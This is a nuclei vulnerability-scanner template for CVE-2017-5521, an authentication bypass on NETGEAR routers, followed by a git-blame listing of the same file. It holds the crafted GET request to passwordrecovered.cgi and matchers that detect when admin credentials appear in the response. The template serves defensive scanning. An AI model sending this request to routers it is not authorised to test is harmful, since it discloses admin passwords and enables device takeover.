nuclei-templates/cves/2017/CVE-2017-5521.yaml

id: CVE-2017-5521

info:
  name: Bypassing Authentication on NETGEAR Routers
  author: princechaddha
  severity: high
  description: An issue was discovered on NETGEAR R8500, R8300, R7000, R6400, R7300, R7100LG, R6300v2, WNDR3400v3, WNR3500Lv2, R6250, R6700, R6900, and R8000 devices.They are prone to password disclosure via simple crafted requests to the web management server.
  reference:
    - https://www.cvedetails.com/cve/CVE-2017-5521/
    - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2017-5521-bypassing-authentication-on-netgear-routers/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.1
    cve-id: CVE-2017-5521
    cwe-id: CWE-200
  tags: cve,cve2017,auth-bypass,netgear

requests:
  - method: GET
    path:
      - "{{BaseURL}}/passwordrecovered.cgi?id=nuclei"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "right\">Router\\s*Admin\\s*Username<"
          - "right\">Router\\s*Admin\\s*Password<"
        condition: and
        part: body
      - type: status
        status:
          - 200
Create CVE-2017-5521.yaml 2021-04-13 19:54:49 +00:00			`id: CVE-2017-5521`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00
Create CVE-2017-5521.yaml 2021-04-13 19:54:49 +00:00			`info:`
			`name: Bypassing Authentication on NETGEAR Routers`
			`author: princechaddha`
Added cve annotations + severity adjustments 2021-09-10 11:26:40 +00:00			`severity: high`
Create CVE-2017-5521.yaml 2021-04-13 19:54:49 +00:00			`description: An issue was discovered on NETGEAR R8500, R8300, R7000, R6400, R7300, R7100LG, R6300v2, WNDR3400v3, WNR3500Lv2, R6250, R6700, R6900, and R8000 devices.They are prone to password disclosure via simple crafted requests to the web management server.`
Removed pipe (\|) character from references, because the structure requires it to be a string slice, not a string Related nuclei tickets: * #259 - dynamic key-value field support for template information * #940 - new infos in template * #834 * RES-84 2021-08-18 11:37:49 +00:00			`reference:`
Create CVE-2017-5521.yaml 2021-04-13 19:54:49 +00:00			`- https://www.cvedetails.com/cve/CVE-2017-5521/`
			`- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2017-5521-bypassing-authentication-on-netgear-routers/`
Added cve annotations + severity adjustments 2021-09-10 11:26:40 +00:00			`classification:`
			`cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`cvss-score: 8.1`
Added cve annotations + severity adjustments 2021-09-10 11:26:40 +00:00			`cve-id: CVE-2017-5521`
			`cwe-id: CWE-200`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`tags: cve,cve2017,auth-bypass,netgear`
Create CVE-2017-5521.yaml 2021-04-13 19:54:49 +00:00
			`requests:`
			`- method: GET`
			`path:`
			`- "{{BaseURL}}/passwordrecovered.cgi?id=nuclei"`

			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`words:`
			`- "right\">Router\\sAdmin\\sUsername<"`
			`- "right\">Router\\sAdmin\\sPassword<"`
			`condition: and`
Update CVE-2017-5521.yaml 2021-04-13 20:03:05 +00:00			`part: body`
Create CVE-2017-5521.yaml 2021-04-13 19:54:49 +00:00			`- type: status`
			`status:`
			`- 200`